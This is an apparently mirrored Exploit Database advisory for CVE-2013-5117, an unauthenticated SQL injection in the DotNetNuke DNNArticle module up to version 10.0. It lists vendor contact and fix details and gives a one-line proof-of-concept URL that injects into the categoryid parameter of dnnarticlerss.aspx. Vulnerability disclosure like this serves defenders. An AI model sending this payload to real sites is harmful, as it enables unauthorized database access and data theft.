DotNetNuke DNNArticle Module 10.0 – SQL Injection

• Exploit Database
• 12 阅读

• 作者： Sajjad Pourali
  日期： 2013-08-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/27602/

• Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability
  References: CVE-2013-5117
  Discovered by: Sajjad Pourali
  
  Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/‎
  Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
  Vendor contact: 2013-8-14
  
  Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
   
  Remote: yes
  Authentication required: no
  User interaction required: no
  Impact: High
   
  Affected:
  
   - DNNArticle 10.0 and earlier
  
  ---
  
  PoC:
  
  http://server/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version
   
  ---
   
   + Sajjad Pourali
   + http://www.securation.com/
   + http://www.cert.um.ac.ir/
   + Contact: sajjad[at]securation.com